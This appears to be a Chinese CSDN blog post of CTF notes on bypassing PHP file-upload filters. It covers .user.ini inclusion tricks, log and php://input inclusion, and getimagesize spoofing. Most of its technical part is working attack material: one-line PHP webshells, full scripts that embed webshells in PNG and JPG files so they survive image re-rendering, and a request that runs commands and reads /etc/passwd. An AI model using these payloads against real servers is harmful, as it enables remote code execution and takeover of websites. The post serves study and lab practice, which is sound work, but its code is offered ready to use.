php--高级文件绕过

于 2024-07-24 06:45:00 发布
阅读量955 收藏 10
点赞数 23
分类专栏: # php开发基础 # CTF+靶场 文章标签: php 开发语言 网络 网络安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/140626303
版权

🎼个人主页:金灰

😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨

专注网络空间安全服务,期待与您的交流分享~

感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️

🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~

免责声明:本文仅做技术交流与学习...

目录

1 .htaccess nginx.htaccess (配置文件)

搞事->

利用

例:

2 服务端内容检测

3 配合伪协议来绕过

4 配置日志包含绕过

5 上传html来xss 执行跨站脚本

6 getimagesize函数绕过

7 png二次渲染绕过

png_creater.php

8 jpg二次渲染绕过

9 phar文件上传绕过

1 .htaccess nginx.htaccess (配置文件)

 

这两个的配置文件优先级要大于php.ini  

     php.ini(最大的配置文件)    --上面两个会覆盖php.ini的配置.

     虚拟主机时代     一个物理服务器,里面可能存放几十上百个网站   每个网站,一个目录--->
     A 网站  需要这样的php.ini配置
     B 网站  却需要那样的php.ini配置
     C 网站  又需要另外的php.ini配置
     ---->
     总的php.ini不动,A B C, 3个网站分别在自己目录定义自己的配置,作用域也仅限于自己目录
     自定义配置文件   .htaccess        nginx.htaccess
(类似于分封制,中央集权,---先给你地位权限,但是你每段时间后要向我负责.)

     在nginx 下,默认使用.user.ini(php.ini里,;代表默认的) 配置文件来进行php的配置.
      默认生效时间...

 

搞事->

找到突破点

利用

    ; php.ini Options  ;
    ; Name for user-defined php.ini (.htaccess) files. Default is ".user.ini"
    ;user_ini.filename = ".user.ini"
    ; To disable this feature set this option to empty value
    ;user_ini.filename =
    ; TTL for user-defined php.ini files (time-to-live) in seconds. Default is 300 seconds (5 minutes)
    ;user_ini.cache_ttl = 300
    (php.ini配置 -- 搜手册)

     创建 .user.ini ,写入:
     auto_append_file=123.txt
     ;成功包含123.txt

     使用:
     auto_append_file=123.txt  来让任意的php文件包含123.txt,执行里面的php代码

  ; Name for user-defined php.ini (.htaccess) files. Default is ".user.ini"
    ;user_ini.filename = ".user.ini"    !!!!!!!!!!!!!!!!!!!!

例:

上传php文件不行.

--上传.user.ini --包含了123.txt ,

--上传123.txt(里面有一句话木马) (php不行,上传配置文件(和.txt文件),.txt文件其包含了一个文件,文件解析)

2 服务端内容检测

 

不局限检测文件名,还会检测文件的后缀,文件的内容.

<?php system eval $_POST
二分法确定出被检测的关键字,使用替代语法绕过.

--发现大部分关键字都被检测,     ; GET POST php REQUEST ?>
用$_cookie可以     <?=eval($_COOKIE[1]);
# 添加cookie的键值:
1    eval(base64_decode(""))?>

3 配合伪协议来绕过

.user.ini:
auto_append_file=php://input

--直接上传配置文件(.user.ini),
上传包含文件(123.txt),-->内容非法.--php标记被检测了.(<?) 
script标签也解析不了php.

.user.ini:
auto_append_file=php://input
--抓包, 改POST发包,直接在最下面写php代码 ---> 发现成功执行php代码

4 配置日志包含绕过

上传 .user.ini: auto_append_file=/var/log/nginx/access.log

UA里干事.

5 上传html来xss 执行跨站脚本

执行js代码

6 getimagesize函数绕过

  getimagesize函数来检测是不是图片,而不采取其他措施的情况下,如果一旦绕过getimagesize函数,就可以实现任意文件上传.

  XBM 格式图片
读取时读到:
  #define %s %d 这种形式,就认为时XBM图片的高或者宽.(伪装高和宽)		  content-type
         高宽  数字

.user.ini:
#define width 100;
#define height 100;
//--->定义,伪装成图片了
auto_append_file=123.txt
auto_append_file=/var/log/nginx/access.log

成功包含后,利用就行了.

 

7 png二次渲染绕过

正常做法:move_uploaded_file 方式移动我们上传的临时文件到上传目录去.
二次渲染做法:通过imagepng方法来,来动态依据我们上传的图片的二次生成一个png图片, 里面的php代码就会被清洗掉.
所以,我们需要使用特殊的方式,来构造我们的图片.

--上传--访问png_creater.php-->生成2.png

--上传2.png,查看图片,--  ../../../../../../etc/passwd 转目录---抓包,改POST发包, url带system函数, 至下面执行命令ls

POST /xxx.xxx?image=xxx.png&0=system HTTP/1.1
.
.
.
1=ls /

png_creater.php

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'2.png');  //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
 */

?>

访问此脚本,成功写入----->

8 jpg二次渲染绕过

使用专用图来生成jpg木马,实现经过二次渲染后,我们的恶意代码,依然能够保留在图片中,通过文件包含,执行里面的php代码
--jpg专用二次渲染图,概率问题...
看脚本.

<?php
    $miniPayload = "<?php system('tac f*');?>";


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>
// 用法  php exp.php a.png

9 phar文件上传绕过

NSSCTF-Web题目21(文件上传-phar协议、RCE-空格绕过)_ctf 文件上传 phar-CSDN博客

 phar文件上传的骚姿势(绕过phar、HALT)phar绕过-CSDN博客

 

phar协议

Phar是PHP的归档格式,类似Java的JAR或是.NET的ZIP。Phar文件可以在不需要解压的情况下在PHP中运行。Phar文件可以用于分发PHP代码,就像你分发Python代码时使用的是.pyc或.whl文件。

Phar伪协议是PHP的一个特性,它允许直接从Phar归档中读取文件,而不需要将Phar文件解压。这样可以直接从Phar文件运行PHP脚本,而无需在服务器上物理地提取文件。
 

php.ini 配置文件里readonly改成Off,去掉;

...这里不做演示

 

金灰
关注
  • 23
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1760
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
00截断上传绕过_文件上传利用绕过方式总结
weixin_39774219的博客
12-20 817
前端验证1.1 修改前端 javascript 文件将限制代码去掉1.2 传参过程中抓包修改后缀1.3 前端禁用 javascript 脚本后端验证2.1基于 MIME 校验2.1.1 校验 content-type 请求头2.1.2 修改文件后缀2.2基于后缀绕过2.2.1黑名单验证绕过2.2.1.1针对 windows 系统绕过2.2.1.1.1 使用其他可执行并且未限制的后缀名2.2...
DVWA-文件包含全等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 3704
dvwa文件包含File Inclusion全等级绕过前言一、Low级别1.1分析文件包含漏洞测试网页1.2 构造URL暴露重要信息1.3 测试本地脚本运行1.4 测试远程脚本运行1.5 包含一句话木马文件,并用菜刀连接1.5.1 一句话木马1.6 上菜刀二、Medium级别2.1双写绕过2.2大小写绕过2.3 绝对路径绕过三、High级别3.1 file协议包含本地文件来进行绕过四、impossible级别分析总结 前言     文件包含漏洞:开发人员为了使代码更灵
PHP花式绕过大全
热门推荐
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,记录一下各种可能会存在绕过php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
web渗透测试----31、检测到绕过web应用防火墙
七天
12-15 4917
WAF(web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 文章目录一、WAF的工作原理二、WAF的常见功能三、WAF种类四、WAF的判断五、WAF的绕过六、WAF指纹七、部分WAF指纹 一、WAF的工作原理 WAF工作在web服务器之前,对基于HTTP/HTTPS协议的通信进行检测和识别。在用户请求到达web服务器前对用户请求进行扫描和过滤,分析并校验每个用户请求的网络包,确保每个用户的请求安全且有效,对无效或有攻击行为的请求进行阻断或隔离。
4文件上传之白名单绕过文件渲染
技术骨干小李的博客
08-09 1958
文件上传的白名单类型绕过以及文件渲染
DVWA文件包含漏洞-(中、高绕过
weixin_51706044的博客
05-23 572
文章目录一、DVWA SecurityMedium級別二、High Security Level 一、DVWA SecurityMedium級別 设置好难度后,查看源码: 通过对代码分析可以发现这里过滤了一些东西,即是array里面的因此我们需要进行绕过 绕过方法 使用绝对路径或相对路径进行绕过,在这里与低级别中路径一致 http://localhost/DVWA-master/vulnerabilities/fi/?page=/etc/passwd 使用的是 str_replace() 函数,
nginx-host绕过的三种方式
weixin_42902697的博客
02-08 682
利用host进行注入时绕过nginx对host的错误处理
SQL注入-waf绕过
m0_52149675的博客
04-06 4361
之所以要谈到WAF的常见特征,是为了更好的了解WAF的运行机制,这样就能增加几分绕过的机会了。本文不对WAF做详细介绍,只谈及几点相关的。 sql注入时绕过waf防护
文件上传漏洞--进阶版 整理笔记
qq_56438857的博客
08-06 1255
对于恶意文件上传的防范,大体分为:(1)前端检测文件后缀。常用绕过:1.bp抓包后改包2.删除前端js校验函数3.构造上传表单(1)后缀名检测通过函数pathinfo()获取文件后缀,将后缀转为小写后判断是不是php。一般防范思路大体分为两种,黑名单和白名单。下面先来说一下黑名单:1.黑名单–名单列表绕过(黑名单之外的后缀名)有些中间件允许解析其他文件后缀名,所以上传一个后缀名为php3、phtml的文件即可,这些文件也会以php格式解析。(还有一种是php大小写绕过,但后端拿到文件名,一般第一步就是全部转
任意文件上传-(一).htaccess文件
05-10
例如,可以设置所有.png文件实际上作为PHP脚本执行,从而绕过文件类型检查。 权限提升:在某些情况下,上传的.htaccess文件能帮助攻击者提升权限,比如允许执行原本禁止执行的文件或访问受限的目录。 目录遍历:利用...
YouDianCMS-PHP
06-25
可DIY装修模板,高级装修组件,还拥有非常丰富的样式选择,不用写代码,也可以装修出漂亮的网站! 功能模块:功能列表核心功能:电脑站、手机站、微信、APP、小程序五站合一,共用空间,数据同步;一键备份全站...
PHP扩展用于PHPFPMFastCGI模式下突破disabledfunctions
08-09
这个扩展的目标是提供一种方法,绕过`disabled_functions`设置中的限制,使得被禁用的函数在特定环境下可以使用。这通常需要深入理解PHP的内部工作原理,包括ZEND引擎和PHP的C扩展编写。通过编写自定义的扩展,我们...
绕过被封qq空间
10-27
本教程将探讨如何通过特定的技术手段“绕过被封的QQ空间”,以获取登录信息,包括SID、skey、P_skey和superkey。 首先,我们要理解这些关键标识符的作用。SID(Session ID)是会话标识,用于识别用户的一次在线会话...
upload-labs靶场通关指南
07-02
这样可以绕过 Content-Type 的限制。 Pass-3:后缀名限制 在 Pass-3 中,我们发现了后缀名的限制。我们可以将文件后缀名改为 phtml,然后直接上传。为了让 apache 能够解析 phtml 文件,我们需要在 httpd.conf 文件...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 286
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 466
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
PHP项目开发流程概述
api77的博客
07-19 547
需求分析是项目开发的起始点,主要目的是明确项目的目标、功能需求、用户群体等。这一阶段通常通过用户访谈、市场调研、竞品分析等方式进行。
MICA:面向复杂嵌入式系统的混合关键性部署框架
最新发布
openEuler_的博客
07-23 664
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值